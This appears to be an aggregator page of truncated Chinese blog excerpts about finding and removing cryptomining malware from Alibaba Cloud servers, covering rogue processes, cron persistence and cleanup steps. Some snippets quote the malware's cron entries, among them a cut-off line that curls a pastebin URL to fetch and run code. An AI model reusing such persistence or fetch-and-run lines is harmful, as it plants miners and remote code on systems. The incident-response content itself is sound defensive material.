特征如下： CPU占用一直比较高，初步分析是挖矿程序： 系统的crontab –l显示调度列表如下： 20 * * * * /root/.aliyun.sh >/dev/null 2>&1 查看脚本内容： #!/bin ...

处理过程： 1、查找异常进程，确定病毒进程，定位病毒脚本的执行用户 2、杀掉病毒进程，注意要检查清楚，病毒进程可能有多个，同时也要注意不要误删系统进程或者阿里云的进程 3、检查定时任务，一般都会有，以达到病毒自启的效果，通过定时任务内容定位病毒脚本的位置，然后删除病毒脚本 4、整改 ...

被入侵后的现象: 发现有qW3xT.2与ddgs两个异常进程，消耗了较高的cpu，kill掉后 过一会就会重新出现。 kill 掉这两个异常进程后，过一段时间看到了如下进程： 首先在/e ...

云服务器ECS挖矿木马病毒处理和解决方案 最近由于网络环境安全意识低的原因，导致一些云服务器ECS中了挖矿病毒的坑。 总结了一些解决挖矿病毒的一些思路。由于病毒更新速度快仅供参考。 1、查看cpu爆满的进程 cpu占用率 100%, 用top 查看cpu100 2、杀死进程 ...

1.发现病毒 近日，因为自己搭建的个人网站做了一版更新，准备去服务器做部署。连接服务器的时候明显感觉到消耗的时间比以往要久，半天才响应过来。 在测试网络没有问题之后，随即使用top命令看下进程情况，结果如下图所示 整齐划一的进程，且自己没有做过这样的部署。发现不对劲，于是马上使用 ...

服务器被植入挖矿，刚解决完，参考文章！ 上午重启服务的时候，发现程序启动死慢，用top命令查看了一下，cpu被占用接近100%，所以无法运行新程序，通过top命令然后输入P，就能看到有两个程序几乎占用了所有的CPU，占用率为700%左右，程序名称为：minerd和AnXqV两个，通过搜索知道 ...

记录一次解决挖矿病毒的过程（进程：susupdate，networkservice） 目录 1.找出病毒进程 2.根据进程号找到运行文件的位置 3.删除病毒进程 4.删除病毒文件 4.1 文件无法正常删除如何解决？ 5. ...

这几天阿里云云服务器cpu一直跑满，一查发现有个定时任务，在搜索一下，发现自己中毒了，原来前几天搞redis学习的时候设置了个弱密码，被ssh暴力破解植入病毒了。 crontab -l*/15 * * * * (curl -fsSL https://pastebin.com/raw ...